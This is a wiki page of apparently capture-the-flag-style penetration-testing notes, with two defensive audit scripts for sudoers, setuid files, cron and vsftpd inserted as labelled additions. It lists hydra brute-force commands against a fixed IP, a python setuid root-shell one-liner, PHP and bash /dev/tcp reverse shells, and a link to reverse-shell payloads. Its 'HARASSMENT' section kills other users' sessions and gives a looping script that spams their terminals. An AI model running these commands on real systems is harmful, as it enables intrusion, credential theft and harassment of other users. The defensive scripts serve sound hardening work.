Difference between revisions of "Enumeration"

From Void-Byte
Revision as of 21:50, 11 November 2020

NMAP the IP address, and perform a service scan.

GOBUSTER each IP address and port.

HASH-IDENTIFIER any hashes found.

!! IF ACCESS GAINED !!

CHECK /etc/passwd

CHECK /etc/crontab

*** STEGANOGRAPHY ***

steghide extract -sf <filename>

stegcrack <filename> <wordlist>

ffuf -w /usr/share/wordlists/common.txt -u http://0.0.0.0/FUZZ -t 120

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.210.9/hidden

nmap -sS -A 10.10.210.9

hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/passlist.txt 10.10.210.9 ssh

hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.210.9

hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/passlist.txt 10.10.210.9 http-post-form "/api/user/login:username=^USER^&password=^PASS^:F=incorrect" -V

Run linpeas if you have access to a Linux machine.

***

ALWAYS TRY TO RUN 'sudo -l'

For every user: find / -type f -perm -u=s 2>/dev/null; getcap -r / 2>/dev/null

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

****

***

ALWAYS 'sudo -l' IF YOU GAIN ACCESS

SEE IF YOU CAN FIND /BIN/BASH or /BIN/SH for ESCALATION WITH "NOPASSWD"
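The checks above (sudo -l, setuid binaries, /etc/crontab) are exactly what an administrator should run on their own hosts before anyone else does. The script below is an added example written for this page, not something from the Void-Byte wiki: a small hardening audit that reports NOPASSWD sudo rules that hand out a shell or ALL, setuid files under a directory, and /etc/crontab entries whose command is a world-writable file. Every function takes a path argument, so it can be run over a copied file (or the constructed samples used to check it) as well as over the live system; the `AUDIT_LIVE` variable and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the Void-Byte page: a local hardening audit for the
# same weaknesses the post-access checklist enumerates. Run as root for a
# complete view; unreadable paths are skipped silently.

# sudoers rules granting NOPASSWD on ALL or on a shell binary.
# Also run it over /etc/sudoers.d/* (sudo -l shows the merged result).
audit_sudoers() {
    grep -v '^[[:space:]]*#' "$1" \
      | grep -E 'NOPASSWD:[[:space:]]*(ALL|[^,]*/(ba|da|z)?sh)([[:space:],]|$)'
}

# setuid files under a directory (the find from this page, with the portable
# numeric form of -u=s).
audit_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# /etc/crontab-style entries (min hour dom mon dow user command) whose command is
# an absolute path to a world-writable file: whoever can edit that file runs
# code as the cron user. Comments, blank lines and VAR=value lines are skipped.
audit_cron() {
    grep -Ev '^[[:space:]]*(#|[A-Za-z_]+=)' "$1" \
      | grep -v '^[[:space:]]*$' \
      | while read -r min hour dom mon dow user cmd rest; do
            case "$cmd" in
                /*) if [ -n "$(find "$cmd" -maxdepth 0 -type f -perm -0002 2>/dev/null)" ]; then
                        echo "world-writable cron target for user $user: $cmd"
                    fi ;;
            esac
        done
}

# Live run against the system files when AUDIT_LIVE=1 is set (hypothetical
# switch for this example, so the functions can also be sourced and reused).
if [ "${AUDIT_LIVE:-0}" = "1" ]; then
    audit_sudoers /etc/sudoers
    audit_suid /
    audit_cron /etc/crontab
fi
```

Each function prints one line per finding and nothing when the check passes, so the output can be diffed between runs or fed to a ticketing script. Note that `getcap -r / 2>/dev/null` from the checklist has no counterpart here because getcap is not installed everywhere; add it alongside `audit_suid` where it exists.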

***

***

REVERSE SHELLS

php -r '$sock=fsockopen("192.168.0.195",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

bash -i >& /dev/tcp/0.0.0.0/1234 0>&1

***

***

SHOW ALL OTHER CONNECTIONS

netstat -natp

***

** HARASSMENT **

There's probably an easier way, but I do this:

See who's logged into your machine -- use who or w:

> who  

mmrozek  tty1         Aug 17 10:03  

mmrozek  pts/3        Aug 17 10:09 (:pts/2:S.0)

Look up the process ID of the shell their TTY is connected to:

> ps t  

PID   TTY      STAT   TIME COMMAND  

30737 pts/3    Ss     0:00 zsh

Laugh at their impending disconnection (this step is optional, but encouraged)

> echo "HAHAHAHAHAHAHAHA" | write mmrozek pts/3

Kill the corresponding process:

> kill -9 30737

HARASSMENT SCRIPT

#!/bin/bash
# replace "username" and "pts/?" with the user and TTY shown by `who`
while true
do
  echo '' | write username pts/?
done

*** ONE LINER REVERSE SHELLS ***

https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt

*** SHOW IPS ON MACHINE ***

netstat -natlp

(kick them off with [kill -9 PID] after finding PID with [netstat -np | grep PORT])


=== FTP ===

If port 21 is open, attempt to sign in as anonymous (with a randomized password).

If you can sign in as anonymous (or as other users), see if you can GET or PUT (don't forget to set the local directory with 'lcd /usr/home/Downloads').

You can also check for hidden files with 'ls -alh'.
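The server-side counterpart of the anonymous-login and PUT test is to look at the FTP daemon's configuration. The script below is an added example for this page, not wiki content: it reads a vsftpd.conf and reports whether anonymous logins are allowed and, if so, whether anonymous users can write. The option names (`anonymous_enable`, `write_enable`, `anon_upload_enable`, `anon_mkdir_write_enable`) are vsftpd's own and the defaults passed in are the ones documented in vsftpd.conf(5); the function names are this example's own, and the configs used to check it are constructed.

```shell
#!/bin/sh
# Added example, not from the Void-Byte page: a vsftpd.conf audit for the
# conditions the anonymous FTP check above looks for.

# Effective value of option $2 in file $1, uppercased (vsftpd accepts yes/YES);
# the last occurrence wins, and $3 is the documented default when unset.
vsftpd_setting() {
    v=$(grep -E "^[[:space:]]*$2=" "$1" | tail -n 1 \
        | cut -d= -f2- | tr -d '[:space:]' | tr '[:lower:]' '[:upper:]')
    printf '%s\n' "${v:-$3}"
}

# One finding per line; empty output means both checks passed.
audit_vsftpd() {
    anon=$(vsftpd_setting "$1" anonymous_enable YES)      # default YES per man page
    write=$(vsftpd_setting "$1" write_enable NO)
    upload=$(vsftpd_setting "$1" anon_upload_enable NO)
    mkd=$(vsftpd_setting "$1" anon_mkdir_write_enable NO)
    if [ "$anon" = "YES" ]; then
        echo "anonymous login enabled (anonymous_enable=$anon)"
    fi
    # anonymous writes need write_enable plus at least one of the anon_* flags
    if [ "$anon" = "YES" ] && [ "$write" = "YES" ] \
       && { [ "$upload" = "YES" ] || [ "$mkd" = "YES" ]; }; then
        echo "anonymous users can write (write_enable=YES, anon_upload_enable=$upload, anon_mkdir_write_enable=$mkd)"
    fi
    return 0
}

# Live use: audit_vsftpd /etc/vsftpd.conf  (or /etc/vsftpd/vsftpd.conf)
```

The first finding corresponds to the "sign in as anonymous" step and the second to the PUT step; a config with `anonymous_enable=NO` produces no output regardless of the write settings, which is the usual hardened state for a server that only serves local users.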